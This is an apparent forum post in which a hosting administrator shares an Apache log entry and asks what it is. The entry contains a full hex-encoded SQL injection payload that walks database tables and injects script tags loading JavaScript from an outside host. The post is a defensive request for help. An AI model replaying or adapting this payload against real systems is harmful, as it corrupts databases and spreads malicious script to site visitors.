Starting 3 days ago I have begun seeing an entry in the Apache access logs on a couple of our production servers (we have over 70). These are not consistent in origin, and also not consistent in their destination (meaning we host many clients' websites on different servers in different physical locations).
The extract looks like embedded Javascript - although it could be an attempt at a .NET injection.
==== Log Extract ====
NN.NNN.59.132 - - [24/Aug/2008:00:00:23 +0000] "GET /thsite_nshw.php
?mwi=319;DECLARE%20@S%20CH
AR(4000);S
ET%20@S=CA
ST(0x44454
34C4152452
04
05420766172636861722832353
5292C40432
0766172636
8617228343
0303029204
44
5434C415245205461626C655F4
37572736F7
2204355525
34F5220464
F522073656
C6
5637420612E6E616D652C622E6
E616D65206
6726F6D207
379736F626
A656374732
06
12C737973636F6C756D6E73206
2207768657
26520612E6
9643D622E6
96420616E6
42
0612E78747970653D277527206
16E6420286
22E7874797
0653D39392
06F7220622
E7
8747970653D3335206F7220622
E787479706
53D3233312
06F7220622
E787479706
53
D31363729204F50454E2054616
26C655F437
572736F722
0464554434
8204E45585
42
046524F4D20205461626C655F4
37572736F7
220494E544
F2040542C4
0432057484
94
C4528404046455443485F53544
15455533D3
0292042454
7494E20657
8656328277
57
064617465205B272B40542B275
D207365742
05B272B404
32B275D3D2
727223E3C2
F7
469746C653E3C7363726970742
07372633D2
2687474703
A2F2F77777
7302E646F7
56
8756E716E2E636E2F637372737
32F772E6A7
3223E3C2F7
3637269707
43E3C212D2
D2
7272B5B272B40432B275D20776
8657265202
72B40432B2
7206E6F742
06C696B652
02
72725223E3C2F7469746C653E3
C736372697
0742073726
33D2268747
4703A2F2F7
77
777302E646F7568756E716E2E6
36E2F63737
273732F772
E6A73223E3
C2F7363726
97
0743E3C212D2D2727272946455
44348204E4
5585420465
24F4D20205
461626C655
F4
37572736F7220494E544F20405
42C4043204
54E4420434
C4F5345205
461626C655
F4
37572736F72204445414C4C4F4
3415445205
461626C655
F437572736
F72%20AS%2
0
CHAR(4000));EXEC(@S); HTTP/1.1" 200 24680 "-" "Mozilla/4.0 (compati
ble; MSIE 7.0; Windows NT 5.1)" "VisitorID=212919310816014
230"
======== END of EXTRACT =======
I have split the actual log line (obviously) here and also removed the origination IP address (which isn't relevant as it not consistent).
The only part of the URI that is valid is the script name and the passed variable "mwi" and its numeric value. The remainder of the URI is what I believe to be the injection attack.
If anyone here has seen/experienced similar entries in their log files I would be interested to hear what your findings were, and similarly if anyone knows what it is that would be even better!
Start Free Trial